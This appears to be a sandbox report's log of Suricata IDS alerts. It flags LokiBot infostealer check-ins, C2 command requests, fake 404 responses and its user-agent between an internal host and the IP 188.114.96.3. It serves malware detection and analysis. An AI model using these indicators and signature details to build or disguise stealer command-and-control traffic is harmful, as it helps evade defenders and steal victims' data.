Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55967 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55943 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55943 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55967 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55967 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55922 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55900 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55896
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55943 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55943 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55900
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55924 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55924 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55898 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55919
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55917 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55989 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55986 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55903 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55986 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55949 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56006 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55949 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56006 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55898 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55908 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55902
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55908 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55908 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55986 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55986 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55908 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56006 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55904 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55904 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55904 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55986
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55945 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55945 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55893
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55935 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55927
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55935 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55932
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56006 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55914 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55918 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55918 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55924
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55936 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55925
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55945 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55905 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55905 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55905 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55989
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55922
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55897 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55984 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55984 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55935 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55984 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56005 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55895
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55904 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55943
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55912 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55984 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55960 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55935 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55936 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55898 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55917
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55894
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55908 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55905 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56005 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55897 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55908
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55918 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55934 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55934 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55934 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55915 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55915 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55915 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55918 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55918 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55984 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55934 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55934 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55952 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55952 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55952 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55935 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55952 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55952 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55936 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55952
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55936 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55898
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55905 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56005 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55897 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55954 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56005 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55912 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56005 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55912 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55915 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55960 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55914 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55912 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55946 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55967
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55945 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55936 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55954 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55954 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55949 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55904 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55954 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55954 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55940 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55940 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55984
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55960 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:56005
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55912 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55960 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55914 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55946 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55991 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55935
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49739
